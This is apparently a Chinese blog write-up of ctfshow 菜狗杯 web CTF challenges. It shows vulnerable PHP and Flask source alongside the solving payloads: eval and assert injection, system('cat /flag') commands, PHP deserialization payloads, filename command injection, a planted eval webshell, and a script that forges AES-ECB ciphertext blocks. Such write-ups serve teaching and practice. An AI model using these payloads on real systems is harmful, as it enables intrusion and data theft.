ctfshow菜狗杯 web 无算力以及easyPytHon_P

web签到题

error_reporting(0);
highlight_file(__FILE__);

eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]);
1
2
3
4

套娃传参
中文要编码

Cookies ：CTFshow-QQ%E7%BE%A4:=a
POST:a=b
GET:?b=c&c[6][0][7][5][8][0][9][4][4]=system('cat /flag');
1
2
3

web2 c0me_t0_s1gn

查看源代码发现一半的flag
在这里插入图片描述控制台提示
到手

我的眼里只有$

error_reporting(0);
extract($_POST);
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
highlight_file(__FILE__);
eval中的变量嵌套我们需要一直赋值，36次

1
2
3
4
5
6

import string
s = string.ascii_letters 
t='_=a&'
code="phpinfo();"
for i in range(35):
    t+=s[i]+"="+s[i+1]+'&'
 
t+=s[i]+'='+code
print(t)
1
2
3
4
5
6
7
8
9

自己修改命令就能获得flag了

POST：
_=a&a=b&b=c&c=d&d=e&e=f&f=g&g=h&h=i&i=j&j=k&k=l&l=m&m=n&n=o&o=p&p=q&q=r&r=s&s=t&t=u&u=v&v=w&w=x&x=y&y=z&z=A&A=B&B=C&C=D&D=E&E=F&F=G&G=H&H=I&I=J&I=system('cat /f*');
1
2

web抽老婆

明天做

一言既出

num=114514);// 
直接把后面的注释掉
num=114514);(1919810      //括号闭合
num=114514%2b1805296          //利用URL编码 '+' =  '%2b'使得前面绕过后再相加等于1919810绕过
1
2
3
4

驷马难追


highlight_file(__FILE__); 
include "flag.php";  
if (isset($_GET['num'])){
     if ($_GET['num'] == 114514 && check($_GET['num'])){
              assert("intval($_GET[num])==1919810") or die("一言既出，驷马难追!");
              echo $flag;
     } 
} 

function check($str){
  return !preg_match("/[a-z]|\;|\(|\)/",$str);
} 
1
2
3
4
5
6
7
8
9
10
11
12
13

这次有过滤了但是还是能正常操作

num=114514%2b1805296  
1

TapTapTap

在这里插入图片描述 F12发现有一个可疑文件，但是这是真猥琐啊500多行，base64解密

在这里插入图片描述

直接访问就行
/secret_path_you_do_not_know/secretfile.txt
1
2

Webshell

 <?php 
    error_reporting(0);

    class Webshell {
        public $cmd = 'echo "Hello World!"';

        public function __construct() {
            $this->init();
        }

        public function init() {
            if (!preg_match('/flag/i', $this->cmd)) {
                $this->exec($this->cmd);
            }
        }

        public function exec($cmd) {
            $result = shell_exec($cmd);
            echo $result;
        }
    }

    if(isset($_GET['cmd'])) {
        $serializecmd = $_GET['cmd'];
        $unserializecmd = unserialize($serializecmd);
        $unserializecmd->init();
    }
    else {
        highlight_file(__FILE__);
    }

?> 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

GET方法传入cmd然后进行反序列化，再进行正则匹配，执行命令

shell_exec：执行命令
unserialize：反序列化

序列化

在这里插入图片描述

将类型转换为对象，反序列化反之


class Webshell {
        public $cmd = 'tac fl*';

}
$j17 = new Webshell();
echo serialize($j17);
echo urlencode(serialize($j17));
?>
1
2
3
4
5
6
7
8
9

?cmd=O:8:"Webshell":1:{s:3:"cmd";s:7:"tac%20fl*";}
1

php反序列化

化零为整



highlight_file(__FILE__);
include "flag.php";

$result='';

for ($i=1;$i<=count($_GET);$i++){
    if (strlen($_GET[$i])>1){
        die("你太长了！！");
        }
    else{
    $result=$result.$_GET[$i];
    }
}

if ($result ==="大牛"){
    echo $flag;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

count函数是数GET的传入参数个数的

直接用URL编码就可以绕过每次传一个

?1=%E5&2=%A4&3=%A7&4=%E7&5=%89&6=%9B
1

无一幸免


include "flag.php";
highlight_file(__FILE__);

if (isset($_GET['0'])){
    $arr[$_GET['0']]=1;
    if ($arr[]=1){
        die($flag);
    }
    else{
        die("nonono!");
    }
}
1
2
3
4
5
6
7
8
9
10
11
12
13

数组等于1直接传

?0=1
1

传说之下（雾）

在这里插入图片描述 F12看js文件发现Game类
控制台传Game.score=3000
再玩一下就行

遍地飘零


include "flag.php";
highlight_file(__FILE__);

$zeros="000000000000000000000000000000";

foreach($_GET as $key => $value){
    $$key=$$value;
}

if ($flag=="000000000000000000000000000000"){
    echo "好多零";
}else{
    echo "没有零，仔细看看输入有什么问题吧";
    var_dump($_GET);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

foreach形成键值对
var_dump打印变量内容
1
2

直接传入

?_GET=flag
键为_GET,值为flag,直接就会打印flag
1
2

茶歇区

遇事不决抓包我们要刷分，利用整数溢出
只能是e的整数溢出至于为啥我不知道因为其他的溢出回显是
“人要脸树要皮，你怎么拿这么多”
在这里插入图片描述

小舔田？


include "flag.php";
highlight_file(__FILE__);

class Moon{
    public $name="月亮";
    public function __toString(){
        return $this->name;
    }
    
    public function __wakeup(){
        echo "我是".$this->name."快来赏我";
    }
}

class Ion_Fan_Princess{
    public $nickname="牛夫人";

    public function call(){
        global $flag;
        if ($this->nickname=="小甜甜"){
            echo $flag;
        }else{
            echo "以前陪我看月亮的时候，叫人家小甜甜！现在新人胜旧人，叫人家".$this->nickname."。\n";
            echo "你以为我这么辛苦来这里真的是为了这条臭牛吗?是为了你这个没良心的臭猴子啊!\n";
        }
    }
    
    public function __toString(){
        $this->call();
        return "\t\t\t\t\t\t\t\t\t\t----".$this->nickname;
    }
}

if (isset($_GET['code'])){
    unserialize($_GET['code']);

}else{
    $a=new Ion_Fan_Princess();
    echo $a;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

先传GET，然后反序列化再进入函数使得等于小甜甜就有flag


class Moon{
    public $name;
}
 
class Ion_Fan_Princess{
    public $nickname="小甜甜";
 
}
$a = new Moon();
$b = new Ion_Fan_Princess();
$a->name=$b;
echo serialize($a);
1
2
3
4
5
6
7
8
9
10
11
12
13

code=O:4:"Moon":1:{s:4:"name";O:16:"Ion_Fan_Princess":1:{s:8:"nickname";s:9:"小甜甜";}}
1

LSB探姬

#初始化全局变量
app = Flask(__name__)
@app.route('/', methods=['GET'])
def index():    
    return render_template('upload.html')
@app.route('/upload', methods=['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        try:
            f = request.files['file']
            f.save('upload/'+f.filename)
            cmd="python3 tsteg.py upload/"+f.filename
            result=os.popen(cmd).read()
            data={"code":0,"cmd":cmd,"result":result,"message":"file uploaded!"}
            return jsonify(data)
        except:
            data={"code":1,"message":"file upload error!"}
            return jsonify(data)
    else:
        return render_template('upload.html')
@app.route('/source', methods=['GET'])
def show_source():
    return render_template('source.html')
if __name__ == '__main__':
    app.run(host='0.0.0.0',port=80,debug=False)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

cmd="python3 tsteg.py upload/"+f.filename
利用py3执行文件名，我们在文件名里面拼接命令即可
1
2

在这里插入图片描述

Is_Not_Obfuscate

在这里插入图片描述

扫描后台
dirb "https://44194809-5de5-4ab4-a3c4-7f5fa8dcc855.challenge.ctf.show/"
1
2

在这里插入图片描述访问/lib.php?flag=0发现不对
改成/lib.php?flag=1发现密文

eJwNkze2o0AABA9EAAI0gmADGGEGEE74DI/w3p1+/wX69euqzpVDJ2a/GkWO4z4QQpnTUq9P5fFd3Uu+YvM2ht+ZXSvYiLXq0o8zaUZ/KSKHeeauPge1HS1rQOaCRvmX5oevKRQajpkc1lMgFhD9uJCH4CSDtZnx8zALzJLhLR2K+WAbhIjf62yY9EFNAfOklJvHScguku8Y5yhtuZSeNGY1vr+NHn6Jn3MYCnm/z9GbI9TH0XZfPPoqqZRrKo48Gdz+odPf29M09uAXmYMftuX5lbIg586dsj8IPGvx3sRUZROiNLXSiM4s1dil6jpvB8cst8uk6ftkZcIF9tF4N0l7mIhew6On6LVPiWk7YaFYcBSI+CLjlUx0heeixgqiWcRtNyHMfs64sx7oVEPY4ZVZg/EmgnR+x6othXTZ2ZGQsEYvRa/U1LaK/4D7Op3ZKrKFnzAs01qSCbbf+P097nH5uUElYiGbytryRvxAe4t1V5PA2dkKlweEANhJ+DU5vzz0+doHA+3opUlU80ol9Ghxas7B3bayW892QCULlB3LuNEEaS2mp1LoXm8dTJAZgM3BGfCHNYbkODF0DqNXrFCMswdFjb9cCnMokKdNZnLUubhW0yA4h807ywaHFZvPxCuG05XdxV6nLiZapgdgHjFpXFbnrwz9LIzLCGMw+F7BHMJPheaGD3faUo71nCiV6QWQu0VW/O2DvG+eubaq5t1a5Y3tYJmti6soht26kuF7jUUg+vZz3guJPIhqEvujvCubvp9WFznqRBETu6RM8yssRUdkXOcelo3bvnM3onXcf9+kQvcSUbuwuEnWHYzn16/ewTo+gVIqv0+DNJC0YUGs9kWnS2+1sAvpdp6qe46VGHNv5Ehm8XNg9SPQyrFYwqRuQZZ/r2muD0WE4G5qRRQ8dnmkgxTVF7Zh61/yvmis14AVf3UwjoHywgVs7MNevg/tCL4JwsgHx6FLo0CANOoThXQcpMmu1ZcY+MB7L5c4S+5arvpFKn/GN4KvCEWYZ+r7inzI+ng3O1T0eaaqFmy63HfCz4xYWYn4PFjC7ukhBJfY7E+fPm6bO7/jSe+2SuGuZ5Crxj8yPiLLA1h61snzuxvqfM0ulqNmp/SzwQLyo5N5HVZEVzMdqY7RiEqT6/FOLji7N/7E3c+8ZLOGGQcDJMM5FARuDOfYyh09+M+I1Hdc+bCze4S0TuOa3j7orHPzP/BLQQLKt6c4cLZ42QbgJwmpowDmVjo/R6dyCuJbWwKGS8BVtzxfh2YhYu+r1n7mrY7nPTxszI6w/TWAErJEBVZwXlj33RDqfi+u45uVP292vZOCDP0RHKuVL20QeMwhqsY47fQ7ZuLeKP/9+w8pT7oT
1

<!-- //测试执行加密后的插件代码 
	   //这里只能执行加密代码，非加密代码不能执行
	  eval(decode($_GET['input'])); -->
<!-- <button name="action" value="test"> 执行 (do)</button>-->
1
2
3
4

?input=eJwNkze2o0AABA9EAAI0gmADGGEGEE74DI%2Fw3p1%2B%2FwX69euqzpVDJ2a%2FGkWO4z4QQpnTUq9P5fFd3Uu%2BYvM2ht%2BZXSvYiLXq0o8zaUZ%2FKSKHeeauPge1HS1rQOaCRvmX5oevKRQajpkc1lMgFhD9uJCH4CSDtZnx8zALzJLhLR2K%2BWAbhIjf62yY9EFNAfOklJvHScguku8Y5yhtuZSeNGY1vr%2BNHn6Jn3MYCnm%2Fz9GbI9TH0XZfPPoqqZRrKo48Gdz%2BodPf29M09uAXmYMftuX5lbIg586dsj8IPGvx3sRUZROiNLXSiM4s1dil6jpvB8cst8uk6ftkZcIF9tF4N0l7mIhew6On6LVPiWk7YaFYcBSI%2BCLjlUx0heeixgqiWcRtNyHMfs64sx7oVEPY4ZVZg%2FEmgnR%2Bx6othXTZ2ZGQsEYvRa%2FU1LaK%2F4D7Op3ZKrKFnzAs01qSCbbf%2BP097nH5uUElYiGbytryRvxAe4t1V5PA2dkKlweEANhJ%2BDU5vzz0%2BdoHA%2B3opUlU80ol9Ghxas7B3bayW892QCULlB3LuNEEaS2mp1LoXm8dTJAZgM3BGfCHNYbkODF0DqNXrFCMswdFjb9cCnMokKdNZnLUubhW0yA4h807ywaHFZvPxCuG05XdxV6nLiZapgdgHjFpXFbnrwz9LIzLCGMw%2BF7BHMJPheaGD3faUo71nCiV6QWQu0VW%2FO2DvG%2Beubaq5t1a5Y3tYJmti6soht26kuF7jUUg%2BvZz3guJPIhqEvujvCubvp9WFznqRBETu6RM8yssRUdkXOcelo3bvnM3onXcf9%2BkQvcSUbuwuEnWHYzn16%2FewTo%2BgVIqv0%2BDNJC0YUGs9kWnS2%2B1sAvpdp6qe46VGHNv5Ehm8XNg9SPQyrFYwqRuQZZ%2Fr2muD0WE4G5qRRQ8dnmkgxTVF7Zh61%2Fyvmis14AVf3UwjoHywgVs7MNevg%2FtCL4JwsgHx6FLo0CANOoThXQcpMmu1ZcY%2BMB7L5c4S%2B5arvpFKn%2FGN4KvCEWYZ%2Br7inzI%2Bng3O1T0eaaqFmy63HfCz4xYWYn4PFjC7ukhBJfY7E%2BfPm6bO7%2FjSe%2B2SuGuZ5Crxj8yPiLLA1h61snzuxvqfM0ulqNmp%2FSzwQLyo5N5HVZEVzMdqY7RiEqT6%2FFOLji7N%2F7E3c%2B8ZLOGGQcDJMM5FARuDOfYyh09%2BM%2BI1Hdc%2BbCze4S0TuOa3j7orHPzP%2FBLQQLKt6c4cLZ42QbgJwmpowDmVjo%2FR6dyCuJbWwKGS8BVtzxfh2YhYu%2Br1n7mrY7nPTxszI6w%2FTWAErJEBVZwXlj33RDqfi%2Bu45uVP292vZOCDP0RHKuVL20QeMwhqsY47fQ7ZuLeKP%2F9%2Bw8pT7oT&action=test
1

Anything is good?Please test it. <?php
header("Content-Type:text/html;charset=utf-8");
include 'lib.php';
if(!is_dir('./plugins/')){
    @mkdir('./plugins/', 0777);
}
//Test it and delete it ！！！
//测试执行加密后的插件代码
if($_GET['action'] === 'test') {
    echo 'Anything is good?Please test it.';
    @eval(decode($_GET['input']));
}

ini_set('open_basedir', './plugins/');
if(!empty($_GET['action'])){
    switch ($_GET['action']){
        case 'pull':
            $output = @eval(decode(file_get_contents('./plugins/'.$_GET['input'])));
            echo "pull success";
            break;
        case 'push':
            $input = file_put_contents('./plugins/'.md5($_GET['output'].'youyou'), encode($_GET['output']));
            echo "push success";
            break;
        default:
            die('hacker!');
    }
}

?> 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

有push和pull两种
先push

?action=push&output=<?php eval($_GET[1]);?>
1

# 导入md5 加密所需模块
import hashlib
# 创建md5 对象
m = hashlib.md5()
# 生成加密串，其中password 是要加密的字符串
m.update("youyou".encode('utf-8'))
# 获取加密串
pw = m.hexdigest()
print(pw)
1
2
3
4
5
6
7
8
9

加密结果
d6e1f0ec8980b49f6061227495a77a44
1
2

?action=pull&input=d6e1f0ec8980b49f6061227495a77a44
成功之后加命令
&1=system('ls /');
&1=system('cat /f*');
1
2
3
4

加粗样式

龙珠NFT

点击开始搜索获得base64

JyhoO0yyT0T55xPULlCbrF1n4l7QipBqiQZXUxm6t/gT1Uc1OSjfXZwIqniz+k2BZ54GXZxmExeDFBVioovwa3G+Vh2aZRF0YaR1fIyEHMqv1y5h+y7jn0vi42/oJnRKWtpP3Oj8IyMqdIB3Am1/RqTyAAmXKNHNvKZrOcLlSBo=
1

在这里插入图片描述这个是 AES_ECB解密不会解密，MD一个web怎么这么多解密

    项目简介
    开始搜索
    查看库存
    查看源码

源代码

</>

    # !/usr/bin/env python
    # -*-coding:utf-8 -*-
    """
    # File       : app.py
    # Time       ：2022/10/20 15:16
    # Author     ：g4_simon
    # version    ：python 3.9.7
    # Description：DragonBall Radar (BlockChain)
    """
    import hashlib
    from flask import *
    import os
    import json
    import hashlib
    from Crypto.Cipher import AES
    import random
    import time
    import base64
    #网上找的AES加密代码，加密我又不懂，加就完事儿了
    class AESCipher():
        def __init__(self,key):
            self.key = self.add_16(hashlib.md5(key.encode()).hexdigest()[:16])
            self.model = AES.MODE_ECB
            self.aes = AES.new(self.key,self.model)
        def add_16(self,par):
            if type(par) == str:
                par = par.encode()
            while len(par) % 16 != 0:
                par += b'\x00'
            return par
        def aesencrypt(self,text):
            text = self.add_16(text)
            self.encrypt_text = self.aes.encrypt(text)
            return self.encrypt_text
        def aesdecrypt(self,text):
            self.decrypt_text = self.aes.decrypt(text)
            self.decrypt_text = self.decrypt_text.strip(b"\x00")
            return self.decrypt_text
    #初始化全局变量
    app = Flask(__name__)
    flag=os.getenv('FLAG')
    AES_ECB=AESCipher(flag)
    app.config['JSON_AS_ASCII'] = False
    #懒得弄数据库或者类，直接弄字典就完事儿了
    players={}
    @app.route('/', methods=['GET'])
    def index():
        """
        提供登录功能
        """
    @app.route('/radar',methods=['GET','POST'])
    def radar():
       """
       提供雷达界面
       """
    @app.route('/find_dragonball',methods=['GET','POST'])
    def  find_dragonball():
        """
        找龙珠，返回龙珠地址
        """
        xxxxxxxxxxx#无用代码可以忽略
        if search_count==10:#第一次搜寻，给一个一星龙珠
            dragonball="1"
        elif search_count<=0:
            data={"code":1,"msg":"搜寻次数已用完"}
            return jsonify(data)
        else:
            random_num=random.randint(1,1000)
            if random_num<=6:
                dragonball=一个没拿过的球，比如'6'
            else:
                dragonball='0'#0就代表没有发现龙珠
        players[player_id]['search_count']=search_count-1
        data={'player_id':player_id,'dragonball':dragonball,'round_no':str(11-search_count),'time':time.strftime('%Y-%m-%d %H:%M:%S')}
        #json.dumps(data)='{"player_id": "572d4e421e5e6b9bc11d815e8a027112", "dragonball": "1", "round_no": "9", "time":"2022-10-19 15:06:45"}'
        data['address']= base64.b64encode(AES_ECB.aesencrypt(json.dumps(data))).decode()
        return jsonify(data)
    @app.route('/get_dragonball',methods=['GET','POST'])
    def get_dragonball():
        """
        根据龙珠地址解密后添加到用户信息
        """
        xxxxxxxxx#无用代码可以忽略
        try:
            player_id=request.cookies.get("player_id")
            address=request.args.get('address')
            data=AES_ECB.aesdecrypt(base64.b64decode(address))
            data=json.loads(data.decode())
            if data['dragonball'] !="0":
                players[data['player_id']]['dragonballs'].append(data['dragonball'])
                return jsonify({'get_ball':data['dragonball']})
            else:
                return jsonify({'code':1,'msg':"这个地址没有发现龙珠"})
        except:
            return jsonify({'code':1,'msg':"你干啥???????"})
    @app.route('/flag',methods=['GET','POST'])
    def get_flag():
        """
        查看龙珠库存
        """
        #如果有7颗龙珠就拿到flag~
    @app.route('/source',methods=['GET','POST'])
    def get_source():
        """
        查看源代码
        """
    if __name__ == '__main__':
        app.run(host='0.0.0.0',port=80,debug=False)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117

脚本

import requests
import base64
import re
from urllib.parse import *

url = 'http://5da1fd16-7436-4635-838a-502be4f68729.challenge.ctf.show/'
sess = requests.Session()

sess.get(url+'?username=1')
for i in range(7):
    url1 = url + 'find_dragonball'
    r1 = sess.get(url1)
    a = r1.json()["address"]
    b = base64.b64decode(a.encode()).hex()

    c = b[:128]+b[160:]

    d = quote(base64.b64encode(bytes.fromhex(c)).decode())

    url2 = url + f'get_dragonball?address={d}'
    r2 = sess.get(url2)
    print(r2.text)
r3  = sess.get(url+'flag')
flag = re.findall('ctfshow{.*?}',r3.text)[0]
print(flag)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

相关阅读:
Go-Python-Java-C-LeetCode高分解法-第七周合集
 Redisson 的 AsyncSemaphore 源码剖析聊聊 Semaphore 限流器
 ElasticSearch教程（详解版）
冠达管理：有色金属迎顺周期行情板块估值降至历史低位
 基于JAVA羽毛球馆场地管理系统计算机毕业设计源码+系统+数据库+lw文档+部署
 【亲测有效】3分钟从零安装高匿名http协议带账号密码的代理服务步骤超简单仅限用于学习交流使用勿用于其他用途
 数据库上机实验3 连接查询和分组查询
 基于PHP+MySQL高校教务选课系统的设计与实现
 kylin使用心得
 基于C语言实现的SML简单程序设计
原文地址：https://blog.csdn.net/2301_81040377/article/details/138137216